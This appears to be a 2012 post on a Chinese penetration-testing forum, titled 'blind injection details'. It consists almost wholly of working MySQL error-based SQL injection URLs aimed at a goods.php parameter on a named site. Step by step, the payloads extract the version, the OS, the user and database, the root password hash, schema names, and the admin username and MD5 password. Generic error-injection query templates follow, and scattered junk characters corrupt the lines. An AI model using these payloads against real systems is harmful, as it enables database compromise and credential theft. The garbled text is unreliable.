找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2056|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
5 G6 C) e" f# y7 K" u' @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) g2 @  R7 j- c% `5 V1 J) w
% t* D* w& a; C' |& k, T8 g* E
判断系统
6 m* V- h' e! q1 N0 Q, ?. D  J& z" m, `8 H8 N1 `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 u# Y9 |* B- V2 [  r# _

# n4 U; r, j, z! j2 Z: |: F+ ^9 Z/ ^

+ t/ d' c7 Q1 J& w当前 user()
/ X3 O- o8 q, d& q( d, ~! U
! g. g4 [7 m9 Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, J$ b* Q5 J% ?, h- v6 U+ Y1 N; k) ]' K# `' U. T( u

2 U% g8 B3 e4 K7 {6 C
$ z, }7 T6 x3 l9 e. j5 e# q6 J当前 database()
4 b  @5 ?" b, [3 |' Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 v9 I' M: q# k: e

$ Q" u* A) w* j0 X. u
" f% e% G9 C- P  m1 `4 `
& p9 U- N& ^* b# Z" C5 @* s
# Z- u) v* _$ d  f8 nroot hash* O9 a+ P4 f' i4 J% }. c
4 R; Z4 s! f. L! m1 ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) ]2 A4 i/ ]" m, r" m# h
) m! }) s5 g3 B+ x+ {' w- e  t9 }( T$ b! t

- \5 N/ ~3 A/ U  q: i9 a- O当前 数据库表名( a1 D: ?$ Q5 y7 K5 g( @3 Y
% I% ]( j* H# c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. F1 C* k! y5 V- \& [
, V; v: }: W# U" T& [7 \/ e  S6 K; E+ d& H
& q+ r% v! s2 ^1 I! ?
当前 数据库 user_name 字段* K3 P4 h; P2 d9 I. {" K( Q9 q
; U6 l7 b" O% S# x2 _: n& A5 b6 M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ f3 u4 Y- k+ M# N
. [# ~' T  k4 Q+ K
当前 数据库 字段 password+ P# p, R* @7 B8 L+ i; c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  Y7 a. T. C; j# D3 W+ G- Z
2 h* C6 a% j6 T: C  x# ^& L' ?# e: w
/ a3 h- D3 q0 d' k4 d; D: |3 m" k  ^8 Y. x/ T; J# o" G2 i- v1 Q
获得 admin passwd(md5)
. I5 ]3 m# B- |
5 b1 z; L- q2 v" ?$ I* R
: s5 `. i" y8 e# f/ J% i$ D7 f# Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; r8 X  g7 S; E1 \
0 q4 B4 P% m$ B' G" K9 C
报错注射3 B( H6 ~+ g& ]* S- f
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a). z) G( ^9 X: u1 k9 u& L0 y
  p4 e: z+ [) P% Z. o
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)2 x3 g9 B4 O" e5 m; Z

/ o$ |& ]( Y- Y* Zand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表